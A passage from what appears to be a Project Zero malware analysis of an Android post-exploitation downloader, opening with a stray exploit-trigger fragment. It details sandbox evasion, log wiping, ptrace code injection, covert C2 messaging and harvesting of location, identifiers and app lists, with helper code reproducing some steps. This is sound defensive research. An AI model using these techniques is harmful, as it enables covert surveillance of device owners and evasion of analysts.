  // Triggers the issue by setting ApplicationName.MaximumLength to a large value.

  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);

}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

In-the-Wild Series: Android Post-Exploitation

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens after the exploit chain has succeeded. Throughout, I will refer to the different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, stage 3 is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and execution of stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and point them to /dev/null. This will prevent output messages from appearing, which might otherwise lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.
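The descriptor rules above can be restated as a small decision function, which is handy when checking them against a trace. This is a minimal sketch, not the binary's code: fd_action is a hypothetical name, and it assumes that the "doesn't include /data/dalvik-cache/arm or /dev/" rule applies only to descriptors numbered above 32, which the description leaves ambiguous.

```python
def fd_action(fd: int, target: str) -> str:
    """Return 'devnull', 'close', or 'keep' for one descriptor.

    `target` is the symlink text read from /proc/self/fd/<fd>.
    """
    if fd <= 2:
        # stdin, stdout, stderr are redirected rather than closed.
        return "devnull"
    if "pipe:" in target or "anon_inode:" in target:
        return "close"
    if fd > 32:
        if "socket:" in target:
            return "close"
        # Assumption: this allow-list check is also limited to fd > 32.
        if "/data/dalvik-cache/arm" not in target and "/dev/" not in target:
            return "close"
    return "keep"
```

Under this reading, a low-numbered socket survives while the same socket above descriptor 32 is closed.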

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function. The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration settings with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the binary using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.
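As a first triage step before emulation, the 0x7E7E7E terminator makes candidate strings easy to locate in a raw dump. The sketch below only finds marker offsets; it does not deobfuscate anything, and find_marker_offsets is a hypothetical helper name rather than part of the IDAPython script mentioned above.

```python
MARKER = bytes.fromhex("7E7E7E")  # "~~~", the end-of-string marker


def find_marker_offsets(blob: bytes) -> list[int]:
    """Return the offset of every non-overlapping marker in `blob`."""
    offsets = []
    pos = blob.find(MARKER)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(MARKER, pos + len(MARKER))
    return offsets
```

Each offset marks the end of one candidate obfuscated string, which can then be handed to whatever emulation harness is in use.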

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%

00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-

00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#

00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.

00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....

00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\

00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.

00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.

00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w

00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....

000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A

000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu

000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#

000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....

000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........

000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.

00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]

00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a

00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..

00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as status and configuration information. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable is shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;

};

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.
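To make the "value for offset 0x20" convention concrete, the sketch below slices a key out of the decrypted keys block. The bytes are the first 0x30 bytes of the dump shown earlier; key_at is a hypothetical helper, not a function from the binary.

```python
KEY_LEN = 0x10

# First 0x30 bytes of the decrypted keys block, copied from the hex dump.
KEYS_BLOCK_PREFIX = bytes.fromhex(
    "9669d307199445297b07183e1e0c6225"
    "335f0f6e3e411eca15373552188f932d"
    "4bf479a4c5fd040849f4b4123fa3ad23"
)


def key_at(block: bytes, offset: int) -> bytes:
    """Return the 0x10-byte hash table key that starts at `offset`."""
    if offset < 0 or offset + KEY_LEN > len(block):
        raise ValueError("offset outside the keys block")
    return block[offset:offset + KEY_LEN]


# The full block is 0x140 bytes long, so it can supply 0x140 // 0x10 = 20 keys.
KEY_COUNT = 0x140 // KEY_LEN
```

For example, key_at(KEYS_BLOCK_PREFIX, 0x20) yields the bytes 4bf479a4...3fa3ad23, which is the key meant by "offset 0x20 in the hash table".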

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;

};
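When inspecting a memory dump, an entry can be unpacked with Python's struct module. This is a sketch under stated assumptions: a 32-bit little-endian ARM layout with 4-byte pointers, 4-byte uints, and no padding. Under those assumptions an entry is 0x14 bytes, so the initial 0x1400-byte table would hold 256 entries; that count is an inference, not something stated in the analysis.

```python
import struct

# key_ptr, key_len, in_use, value_ptr, value_len (assumed 4 bytes each).
ENTRY = struct.Struct("<5I")


def parse_entry(raw: bytes) -> dict:
    """Unpack one hashtable_entry from the start of `raw`."""
    key_ptr, key_len, in_use, value_ptr, value_len = ENTRY.unpack(raw[:ENTRY.size])
    return {
        "key_ptr": key_ptr,
        "key_len": key_len,
        "in_use": bool(in_use),
        "value_ptr": value_ptr,
        "value_len": value_len,
    }


# Number of entries the initial table could hold under the assumed layout.
INITIAL_ENTRIES = 0x1400 // ENTRY.size
```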

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of, for example the filename under which to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are fewer than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
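A recovered state.parcel can be decoded by reversing the XOR. The sketch below assumes each entry is a 32-bit little-endian timestamp, which fits the 4-byte XOR constant but is not confirmed by the analysis; the function names are hypothetical.

```python
import struct

XOR_KEY = 0xFF12EE34


def encode_entries(timestamps: list[int]) -> bytes:
    """XOR each 32-bit timestamp with the key and pack it little-endian."""
    return b"".join(struct.pack("<I", (t ^ XOR_KEY) & 0xFFFFFFFF) for t in timestamps)


def decode_entries(raw: bytes) -> list[int]:
    """Recover the timestamps; `raw` must be a multiple of 4 bytes long."""
    return [value ^ XOR_KEY for (value,) in struct.iter_unpack("<I", raw)]
```

Because XOR is its own inverse, decoding is the same operation as encoding applied to the stored words.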

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and status information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file to.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.
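The file layout described above (IV, then ciphertext, then a 4-byte CRC32 trailer) can be split and sanity-checked without the AES key. This sketch makes three assumptions that the analysis does not confirm: the checksum covers only the ciphertext and not the IV, it is stored little-endian, and it is the standard CRC-32 that zlib implements. split_uierrors is a hypothetical helper name.

```python
import struct
import zlib

IV_LEN = 0x10
CRC_LEN = 4


def split_uierrors(blob: bytes) -> tuple[bytes, bytes, bool]:
    """Split a uierrors.txt image into (iv, ciphertext, crc_matches)."""
    if len(blob) < IV_LEN + CRC_LEN:
        raise ValueError("file too short to hold an IV and a CRC32")
    iv = blob[:IV_LEN]
    ciphertext = blob[IV_LEN:-CRC_LEN]
    (stored_crc,) = struct.unpack("<I", blob[-CRC_LEN:])
    crc_matches = (zlib.crc32(ciphertext) & 0xFFFFFFFF) == stored_crc
    return iv, ciphertext, crc_matches
```

If the checksum does not match on a real sample, the coverage or byte-order assumptions are the first things to revisit.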

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

| Environment Variable Name | Value |
| --- | --- |
| abc | Address of the decrypted data block |
| def | Address of the function that will send logging messages to the C2 server |
| def2 | Address of the function that adds logging messages to the error and/or informational logging message queues |
| ghi | Points to the decrypted block of hashtable keys |
| ddd | Address of the function that performs inflate (decompress) |
| ccc | Address of the function that performs deflate (compress) |
| 0x10 bytes at 0x228CC | ??? |
| 0x10 bytes at 0x228DC | Pointer to the string representation of the hex_d_uuid |
| 0x10 bytes at 0x228F0 | Pointer to the C2 domain URL |
| 0x10 bytes at 0x22904 | Pointer to the port string for the C2 server |
| 0x10 bytes at 0x22918 | Pointer to the beginning of the certificate |
| 0x10 bytes at 0x2292C | 0x1000 |
| 0x10 bytes at 0x22940 | Pointer to +4AA in decrypted data block |
| 0x10 bytes at 0x22954 | 0x14 |
| 0x10 bytes at 0x22698 | Pointer to the user-agent string |
| PPR | SELinux status such as “selinux-init-read-fail” or “selinux-no-mdm” |
| PPMM | Set if there is no “persist.security.mdm.policy” string in /init |
| PPQQ | Set if the “persist.security.mdm.policy” string is in /init |

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2” adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
      • /data/tombstones
      • /data/misc/audit
      • /data/system/dropbox
      • /data/anr
      • /data/log
  • Unlink the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is 8 to 16 lowercase Latin characters long. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will try up to 3 different hostnames and bail if none of them returns EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.
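For analysts who want to recognize this check in a packet capture, the sketch below builds the kind of Type A query described above and extracts the response code from a reply. It follows the standard DNS wire format; the function names, the fixed transaction ID, and the choice to generate a bare label without a top-level domain are assumptions for illustration, since the analysis does not give those details.

```python
import random
import string
import struct

NXDOMAIN = 3  # RCODE meaning "Non-Existent Domain"


def random_label() -> str:
    """Return 8 to 16 random lowercase Latin characters."""
    length = random.randint(8, 16)
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def build_a_query(hostname: str, txid: int = 0x1234) -> bytes:
    """Build a DNS query for the A record of `hostname`."""
    # Header: ID, flags (recursion desired), 1 question, 0 other records.
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in hostname.split(".")
    ) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def rcode(response: bytes) -> int:
    """Return the 4-bit response code from a DNS reply header."""
    (flags,) = struct.unpack(">H", response[2:4])
    return flags & 0x000F
```

A sandbox that answers every name returns RCODE 0 with an address, whereas a real resolver returns NXDOMAIN for a random name, which is the distinction the binary relies on.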

Handshake with the C2 Server

The C2 server hostname and port are read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties. It has 2 different ways to read system properties:

  • Call __system_property_get, resolved via dlopen('/system/lib/libc.so') and dlsym('__system_property_get').
  • Execute getprop via popen.

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the position at which the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each Android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.
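The getSubscriberId example amounts to a per-SDK lookup. The sketch below encodes only the three ranges quoted above; the function names are hypothetical, and the binary's actual table covers more functions than this one.

```python
def get_subscriber_id_code(sdk: int) -> int:
    """Return the iphonesubinfo transaction code for getSubscriberId."""
    if 8 <= sdk <= 20:
        return 3
    if sdk == 21:
        return 5
    if 22 <= sdk <= 29:
        return 7
    raise ValueError(f"SDK version {sdk} is outside the hardcoded range 8-29")


def service_call_command(sdk: int) -> str:
    """Build the shell command line for the given SDK version."""
    return f"service call iphonesubinfo {get_subscriber_id_code(sdk)}"
```

Hardcoding the table this way is what ties the binary to SDK versions 8 through 29: any release outside that range has no known code.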

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid
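All six of these fields are available in the text of /proc/<pid>/status on Linux. The sketch below parses that text; whether the binary reads this particular file, rather than another entry under /proc, is an assumption, and parse_status is a hypothetical name.

```python
FIELDS = ("Name", "Pid", "PPid", "Groups", "Uid", "Gid")


def parse_status(text: str) -> dict:
    """Extract the fields of interest from the text of /proc/<pid>/status."""
    info = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key in FIELDS:
            info[key] = value.strip()
    return info
```

On a live system the input would come from reading /proc/<pid>/status for each numeric directory under /proc.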

Logging Information

As described in the Error Handling & Logging section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s computed by taking the CRC32 of the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE data[4096];

};

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.
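The compress, tag, and byte-swap steps can be sketched as follows, leaving out the AES256 step. Several details are assumptions: the serialized form here is just the three integer fields followed by the compressed bytes (the in-memory struct also has a pointer and a fixed 4096-byte buffer), zlib.compress stands in for the binary's deflate function, and the byte swap is applied per 32-bit word with zero padding. All function names are hypothetical.

```python
import struct
import zlib


def message_code(seed16: bytes, ident: int) -> int:
    """CRC32 of the 0x10 seed bytes plus the identification code, mod 2**32."""
    return (zlib.crc32(seed16) + ident) & 0xFFFFFFFF


def bswap32_words(data: bytes) -> bytes:
    """Reverse the byte order of every 32-bit word, zero-padding the tail."""
    padded = data + b"\x00" * (-len(data) % 4)
    words = struct.unpack(f"<{len(padded) // 4}I", padded)
    return struct.pack(f">{len(words)}I", *words)


def build_message(payload: bytes, seed16: bytes, ident: int) -> bytes:
    """Compress `payload` and prepend the three length and code fields."""
    compressed = zlib.compress(payload)
    header = struct.pack(
        "<III", len(compressed), len(payload), message_code(seed16, ident)
    )
    return header + compressed
```

Storing both lengths lets the receiver size its output buffer before inflating, which is presumably why the struct carries compressedDataLength and uncompressedDataLength separately.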

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive

Content-Type:application/octet-stream

Content-Length:%u

Cookie: %s

The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”. The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts it from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.
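Recovering the identification code is a subtraction modulo 2^32. A minimal sketch, assuming the standard CRC-32 that zlib implements and a hypothetical function name:

```python
import zlib


def identification_code(message_code: int, seed16: bytes) -> int:
    """Subtract the CRC32 of the 0x10 seed bytes from the message code."""
    return (message_code - zlib.crc32(seed16)) & 0xFFFFFFFF
```

The mask matters because the addition on the sending side can wrap around 32 bits. The identification codes themselves are round numbers in decimal: 0x2710 is 10000 and 0x4E20 is 20000.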

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process. The child calls the function init from an ELF library, and the parent then injects the code from the response into the child process using ptrace. The ELF library, which is opened with dlopen before init is called, is named /system/bin/%016lx%016lx, with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the provided file path in the third argument or it will generate a new file path. If it’s generating a new temporary file name, the code will go down the following list of directory names, beginning with /cache. In the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in as the fifth argument.
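The directory fallback in func3 can be sketched as a loop over the candidate list. This is an illustration of the selection order only: the SELinux attribute step is left out, the function name is hypothetical, and the analysis does not say what happens when mkstemp fails in a directory that can be stat'ed, so the sketch simply lets that error propagate.

```python
import os
import tempfile

CANDIDATE_DIRS = [
    "/cache",
    "/mnt/secure/asec",
    "/mnt/secure/staging",
    "/mnt/secure",
    "/mnt/obb",
    "/mnt/asec",
    "/mnt",
    "/storage",
]


def write_to_first_usable_dir(data: bytes, mode: int, candidates=CANDIDATE_DIRS) -> str:
    """Write `data` to a temp file in the first directory that can be stat'ed."""
    for directory in candidates:
        try:
            os.stat(directory)
        except OSError:
            continue  # Not present or not reachable: try the next candidate.
        fd, path = tempfile.mkstemp(dir=directory)
        with os.fdopen(fd, "wb") as handle:
            handle.write(data)
        os.chmod(path, mode)
        return path
    raise FileNotFoundError("no candidate directory could be stat'ed")
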